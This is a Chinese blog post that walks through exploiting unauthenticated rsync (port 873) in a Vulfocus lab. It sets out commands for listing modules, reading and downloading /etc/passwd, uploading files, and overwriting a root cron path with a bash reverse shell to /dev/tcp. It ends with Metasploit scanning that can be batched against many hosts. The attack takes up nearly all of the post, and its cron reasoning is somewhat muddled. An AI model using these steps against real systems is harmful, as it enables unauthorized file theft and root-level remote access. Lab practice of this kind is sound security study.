rsync未授权-873

环境搭建

docker pull vulfocus/vulfocus:latest
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.40.130 vulfocus/vulfocus

rsync是Linux系统下的数据镜像备份工具，使用rsync可以快速增量备份数据，支持本地复制，或与其他SSH、rsync主机同步。

测试漏洞存在：

rsync rsync://192.168.40.130:60522

查看文件：

rsync rsync://192.168.40.130:60522/src/etc/passwd

下载文件：

rsync rsync://192.168.40.130:60522/src/etc/passwd ./passwd

上传文件：

rsync ceshi.txt rsync://192.168.40.130:60522/src/ceshi.txt

计划任务反弹shell：

# 读取计划任务
rsync rsync://192.168.40.130:60522/src/etc/crontab /tmp/cron.txt

# 查看计划任务
cat /tmp/cron.txt

计划任务中有这么一行：17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
含义：每小时的第17分钟，以root用户的身份执行/etc/cron.hourly文件

所以接下来就是将反弹shell的文件替代/etc/cron.hourly

# 创建文件 shell
/bin/bash -i >& /dev/tcp/192.168.40.130/2333 0>&1
# 上传并覆盖/etc/hourly
rsync -av shell rsync://192.168.40.130:60522/src/etc/hourly

开始监听并等待17分钟接收shell即可

探测：

use scanner/rsync/modules_list
set rhosts 192.168.40.130
set rport 39367
show options
run

批量：

set rhosts file:/tmp/list

posted @ 2024-10-16 12:37 starme 阅读(8) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· Redis未授权-6379

· hackmyvm-coffeeshop

· rsync 未授权访问漏洞

· Rsync未授权访问漏洞

· Rsync未授权访问漏洞复现

阅读排行：
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布：重大改进与新特性概览！
· AI与.NET技术实操系列（二）：开始使用ML.NET
· .NET10 - 预览版1新功能体验（一）